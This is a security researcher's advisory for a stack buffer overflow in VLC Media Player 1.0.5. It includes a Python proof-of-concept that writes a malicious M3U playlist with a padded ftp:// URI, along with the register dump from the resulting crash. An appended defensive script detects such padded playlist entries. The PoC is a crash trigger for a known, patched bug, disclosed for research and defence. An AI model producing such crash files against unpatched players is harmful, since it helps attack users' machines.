VLC Player M3U file ftp:// URI Handler Remote Stack Buffer Overflow



There is a stack buffer overflow vulnerability in VLC Media Player v1.0.5 (Goldeneye) when handling M3U files that contain an ftp:// URI.

When we open the malicious file, our EDX and EBP registers point to user-supplied data, which might lead to code execution.
State of the registers when we open the malicious file is:

EAX 00000000
ECX 7008A2B7 ASCII ";type="
EDX 01DC743B ASCII "ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
EBX 01C8C120
ESP 0324FB78
EBP 01D19008 ASCII "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
ESI 00000000
EDI 00000000
EIP 77C47C7E msvcrt.77C47C7E
C 0  ES 0023 32bit 0(FFFFFFFF)


Attaching an image of the above stack trace and the PoC script.

#############START PYTHON########################
print("\n\n***VLC Player M3U file ftp:// URI Handler Remote Stack Buffer Overflow***\n")

# Tested on Microsoft Windows XP Professional SP3
# Application Vulnerable: VLC Media Player v1.0.5 (Goldeneye)
# Not Vulnerable: VLC Media Player v1.1.0 (The Luggage), checked on Windows 7

# EDX register points to our data after 4255 bytes
buf1 = "ftp://" + "PRAV" + "\x44" * 4251   # "\x44" is 'D': the bytes EBP points at in the dump below
buf2 = buf1 + "A" * 4
buf3 = buf2 + "Z" * (100000 - 4259)         # the 'Z' filler is what EDX points at

print("100000-4259 is: ", 100000 - 4259)
print("Creating malicious M3U file . . .\n")

# Write the playlist as a single ftp:// line
with open('m3uftp.m3u', 'w') as filem3u:
    filem3u.write(buf3)

print("Created M3U file. Open with VLC Media Player v1.0.5 (Goldeneye)\n\n")

'''
Register state observed when the file is opened:

EAX 00000000
ECX 7008A2B7 ASCII ";type="
EDX 01DC743B ASCII "ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
EBX 01C8C120
ESP 0324FB78
EBP 01D19008 ASCII "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
ESI 00000000
EDI 00000000
EIP 77C47C7E msvcrt.77C47C7E
C 0  ES 0023 32bit 0(FFFFFFFF)
'''
# Hi to all Indian Hacker$, Andhra/ Telangana Hacker$ ;)
# Praveen Darshanam
#############END PYTHON###########################
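As an added defensive example (not part of the advisory and not VLC project code), the following Python 3 script parses an M3U playlist and flags entries of the shape the PoC above writes: an oversized location line, a long run of one repeated byte (the padding pattern visible in the EDX and EBP dump), and the ftp:// scheme that the affected handler processes. The length limit, the run-length threshold and the sample playlist are constructed assumptions rather than values from the advisory; the actual remediation remains moving off 1.0.5, since the script's notes report 1.1.0 as not vulnerable.

```python
import re
import sys

# Constructed sample playlist (not from the advisory): one ordinary entry and
# one oversized ftp:// entry built the same way as the advisory's PoC buffer.
SAMPLE_M3U = (
    "#EXTM3U\n"
    "#EXTINF:123,Sample Title\n"
    "ftp://files.example/music/track01.mp3\n"
    "ftp://" + "PRAV" + "D" * 4251 + "A" * 4 + "Z" * (100000 - 4259) + "\n"
)

# Assumed policy limits, not values from the advisory.
MAX_ENTRY_LEN = 2048        # no legitimate playlist entry comes anywhere near this
MIN_SUSPICIOUS_RUN = 256    # a run of one repeated byte this long is padding, not a path
REPEAT_RUN = re.compile(r"(.)\1{%d,}" % (MIN_SUSPICIOUS_RUN - 1))


def parse_m3u(text):
    """Yield (line_no, entry) for every non-empty, non-comment line of an M3U file.

    Lines starting with '#' are directives or comments (#EXTM3U, #EXTINF);
    every other line is a location the player hands to a URI/access handler.
    """
    for line_no, line in enumerate(text.splitlines(), start=1):
        entry = line.strip()
        if entry and not entry.startswith("#"):
            yield line_no, entry


def audit_entry(entry, max_len=MAX_ENTRY_LEN):
    """Return the reasons this entry looks like overflow padding (empty list if clean)."""
    reasons = []
    if len(entry) > max_len:
        reasons.append("length %d exceeds %d" % (len(entry), max_len))
    match = REPEAT_RUN.search(entry)
    if match:
        reasons.append("run of %d x %r" % (len(match.group(0)), match.group(1)))
    # ftp:// on its own is legitimate; it is only noted when the entry is
    # already suspicious, because that is the handler affected in VLC 1.0.5.
    if reasons and entry.lower().startswith("ftp://"):
        reasons.append("ftp:// scheme (handler affected in VLC 1.0.5)")
    return reasons


def audit_m3u(text, max_len=MAX_ENTRY_LEN):
    """Return one finding per suspicious entry as {'line', 'length', 'reasons'}."""
    findings = []
    for line_no, entry in parse_m3u(text):
        reasons = audit_entry(entry, max_len)
        if reasons:
            findings.append({"line": line_no, "length": len(entry), "reasons": reasons})
    return findings


if __name__ == "__main__":
    # Audit a playlist given on the command line, or the constructed sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "r", encoding="latin-1") as fh:
            data = fh.read()
    else:
        data = SAMPLE_M3U
    for finding in audit_m3u(data):
        print("line %d (%d bytes): %s"
              % (finding["line"], finding["length"], "; ".join(finding["reasons"])))
```

Run with no arguments to audit the constructed sample, or pass a playlist path; the file is read as latin-1 so that arbitrary bytes in a hostile playlist cannot abort the audit with a decode error. The repeated-byte check is deliberately separate from the length check: a long entry made of distinct characters could be an unusual but real URL, whereas thousands of identical bytes are the signature of a padded buffer.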
Hi to all Indian Hacker$, Andhra/ Telangana Hacker$ ;)

Best Regards,
Praveen Darshanam,
Security Researcher
